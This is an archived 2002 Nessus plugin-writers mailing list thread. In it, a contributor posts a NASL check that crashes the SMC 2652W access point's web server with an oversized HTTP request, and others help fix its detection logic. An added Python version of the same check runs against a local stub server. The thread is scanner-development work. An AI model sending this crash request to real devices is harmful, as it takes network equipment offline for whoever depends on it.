Mailing List Archive

Scripts
4 scripts here.
citrix.nasl looks for citrix published applications (based on perl script by
ian.vitek@ixsecurity.com)
sql_injection.nasl tries to poison cgi params (based on wpoison)
uddi.inc is an include file for creating SOAP headers
uddi.nasl looks for .net servers which have public web services being
offered via uddi registry (should maybe add DISCO in the future?)

John Lampe
https://f00dikator.hn.org/

"Knowledge will forever govern ignorance, and a people who mean to be their
own governors, must arm themselves with the power knowledge gives. A popular
government without popular information or the means of acquiring it, is but
a prologue to a farce or a tragedy or perhaps both."
--James Madison

Re: Scripts
Since my last 4 nasls just made it to CVS, does that mean I can send more
now? ;-)

The script below was a 0-effort jobbie and credits go to Dave Aitel's
SPIKE....

#
# Copyright 2002 by John Lampe ... j_lampe@bellsouth.net
# BUG FOUND WITH SPIKE 2.7
# See the Nessus Scripts License for details
#


if(description)
{
script_id();                        # left empty in the posted version
script_version ("$Revision: 0.1 $");
name["english"] = "Crash SMC AP";
script_name(english:name["english"]);
desc["english"] = "
The SMC 2652W Access point web server crashes when sent a specially
formatted HTTP request. Contact vendor
for a fix

Risk factor : Medium/Low";

script_description(english:desc["english"]);
summary["english"] = "Crash SMC Access Point";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);        # destructive check: only run when DoS tests are enabled
script_copyright(english:"This script is Copyright (C) 2002 John Lampe...j_lampe@bellsouth.net");
family["english"] = "General";
script_family(english:family["english"]);
exit(0);
}

#
# The script code starts here
#
# found with SPIKE 2.7 http://www.immunitysec.com/spike.html
# req string directly horked from SPIKE API
#

port = get_kb_item("Services/www");
if(!port)port = 80;

# Trigger request: a 240-byte path (crap() pads with 'X') followed by the
# header set SPIKE was replaying. Each request line and header must stay on
# one line; a break inside the string would be sent to the AP as-is.
req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif HTTP/1.1\r\n");
req = string(req, "Referer: http://localhost/bob\r\n");
req = string(req, "Content-Type: application/x-www-form-urlencoded\r\n");
req = string(req, "Connection: Keep-Alive\r\n");
req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n");
req = string(req, "Variable: result\r\n");
req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n");
req = string(req, "Accept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");


# Send the trigger and drop the connection without reading a reply.
soc = open_sock_tcp(port);
if (soc) {
send(socket:soc, data:req);
close(soc);
}

# Reconnect and probe: a refused connection, or a "GET /" that gets nothing
# back within five seconds, is taken as the web server having died.
soc = open_sock_tcp(port);
if (!soc) {security_hole(port); exit(0); }
req = string("GET / HTTP/1.0\r\n\r\n");
send(socket:soc, data:req);
bling = recv(socket:soc, length:1024, timeout:5);
if (!bling) security_hole(port);




John Lampe
https://f00dikator.hn.org/


----- Original Message -----
From: "Thomas Reinke" <reinke@e-softinc.com>
To: "John Lampe" <j_lampe@bellsouth.net>
Cc: "plugins writer" <plugins-writers@list.nessus.org>; "Renaud Deraison"
<deraison@cvs.nessus.org>
Sent: Wednesday, October 09, 2002 3:23 PM
Subject: Re: Scripts


John Lampe wrote:
> 4 scripts here.
> citrix.nasl looks for citrix published applications (based on perl script by
> ian.vitek@ixsecurity.com)
> sql_injection.nasl tries to poison cgi params (based on wpoison)
> uddi.inc is an include file for creating SOAP headers
> uddi.nasl looks for .net servers which have public web services being
> offered via uddi registry (should maybe add DISCO in the future?)
>
> John Lampe
> https://f00dikator.hn.org/
>
> "Knowledge will forever govern ignorance, and a people who mean to be their
> own governors, must arm themselves with the power knowledge gives. A popular
> government without popular information or the means of acquiring it, is but
> a prologue to a farce or a tragedy or perhaps both."
> --James Madison
>

Any reason why these haven't been included in the standard
distribution of nasl scripts?

Thomas

Re: Scripts
Script works fine at killing the webserver...however, it doesn't report the
security_hole()

I tried from GUI and from command line

nessus# nasl -t 10.10.10.31 smc_www_dos.nasl
smc_www_dos.nasl : Warning : evaluating unknown variable - description
smc_www_dos.nasl - Error ! Function "http_is_dead" does not exist
smc_www_dos.nasl - Error ! Function "http_is_dead" does not exist
nessus# nessusd -d
This is Nessus 1.2.6 for FreeBSD 4.5-RELEASE
compiled with gcc version 2.95.3 20010315 (release) [FreeBSD]
Current setup :
Experimental session-saving : enabled
Experimental KB saving : enabled
Thread manager : fork
nasl : 1.2.6
libnessus : 1.2.6
SSL support : enabled
SSL is used for client / server communication
Running as euid : 0

John Lampe
https://f00dikator.hn.org/


----- Original Message -----
From: "Renaud Deraison" <deraison@nessus.org>
To: "plugins writer" <plugins-writers@list.nessus.org>
Sent: Thursday, October 10, 2002 6:11 AM
Subject: Re: Scripts



Could you check that the script still works against an SMC AP ?


-- Renaud

Re: Scripts
On Wed, Oct 09, 2002 at 07:38:41PM +0100, John Lampe wrote:
> The script below was a 0-effort jobbie and credits go to Dave Aitel's
> SPIKE....

Attached is a somewhat revised version of your script - it correctly
fills the 'Host:' header so that it will go through a transparent proxy,
and it uses http_is_dead() to determine if the check needs to be made or
was successful.

Could you check that the script still works against an SMC AP ?


-- Renaud
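The check this thread converges on (send the SPIKE-derived request, then decide whether the AP's web server is still answering), written out as an added Python example. It is not the plugin's code, not part of any message in the thread, and not SMC firmware: the `StubHTTPServer` is a constructed stand-in for the AP that fakes the crash, and its 200-byte request-line threshold is made up. It does two things the posted NASL does not: it fills `Host:` from the target, as the revised plugin does, so the request survives a transparent proxy, and it probes liveness before sending the trigger, which is what calling `http_is_dead()` first buys you, so a server that was already down is not reported as crashed by the check. Names such as `run_dos_check` and `http_is_alive` are this example's own.

```python
import socket
import threading

PAD_LEN = 240  # the plugin's crap(240): 240 bytes of 'X' in the request path


def build_dos_request(host, pad_len=PAD_LEN):
    """The trigger request from the posted plugin, header for header, except
    that Host: is filled from the target so a transparent proxy forwards it
    to the AP rather than to 'localhost'."""
    path = "/" + "X" * pad_len + ".html?OpenElement&FieldElemFormat=gif"
    lines = [
        "GET " + path + " HTTP/1.1",
        "Referer: http://localhost/bob",
        "Content-Type: application/x-www-form-urlencoded",
        "Connection: Keep-Alive",
        "Cookie: VARIABLE=DAVEAITEL; path=/",
        "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)",
        "Variable: result",
        "Host: " + host,
        "Content-length: 13",
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png",
        "Accept-Encoding: gzip",
        "Accept-Language: en",
        "Accept-Charset: iso-8859-1,*,utf-8",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def http_is_alive(host, port, timeout=5.0):
    """The plugin's reconnect-and-GET probe (the job http_is_dead() from
    http_func.inc does): connect, send a minimal request, expect bytes back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(b"GET / HTTP/1.0\r\n\r\n")
            return len(s.recv(1024)) > 0
    except OSError:  # refused, reset or timed out
        return False


def run_dos_check(host, port, pad_len=PAD_LEN):
    """Return 'dead_before', 'vulnerable' or 'not_vulnerable'. Probing before
    the trigger keeps an already-dead server from being reported as our kill."""
    if not http_is_alive(host, port):
        return "dead_before"
    try:
        with socket.create_connection((host, port), timeout=5.0) as s:
            s.sendall(build_dos_request(host, pad_len))
    except OSError:
        pass  # a dropped connection is a symptom, not the verdict; the re-probe decides
    return "not_vulnerable" if http_is_alive(host, port) else "vulnerable"


class StubHTTPServer:
    """Constructed stand-in for the AP's web server (not SMC code): answers
    GET / with 200; with crash_on_long=True it stops listening for good after
    the first request line longer than 200 bytes (an invented threshold)."""

    def __init__(self, crash_on_long):
        self.crash_on_long = crash_on_long
        self.running = True
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.sock.settimeout(0.2)
        self.port = self.sock.getsockname()[1]
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _serve(self):
        while self.running:
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            with conn:
                if not self.running:
                    return
                conn.settimeout(1.0)
                try:
                    data = conn.recv(4096)
                    if self.crash_on_long and len(data.split(b"\r\n", 1)[0]) > 200:
                        self.stop()  # the "crash": nobody is listening any more
                        return
                    conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nok")
                except OSError:
                    pass

    def stop(self):
        self.running = False
        self.sock.close()
        if threading.current_thread() is not self.thread:
            self.thread.join(timeout=1.0)


if __name__ == "__main__":
    for crashes in (True, False):
        srv = StubHTTPServer(crash_on_long=crashes)
        print("crash_on_long=%s -> %s" % (crashes, run_dos_check("127.0.0.1", srv.port)))
        srv.stop()
```

Run it and the crashing stub reports `vulnerable`, the well-behaved one `not_vulnerable`; point `run_dos_check` at a port with nothing listening and it returns `dead_before` instead of a finding, which is the case the original script got wrong when the reconnect failed for an unrelated reason.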

Re: Scripts
"John Lampe" <j_lampe@bellsouth.net> writes:

> smc_www_dos.nasl - Error ! Function "http_is_dead" does not exist

Add this line:
include("http_func.inc");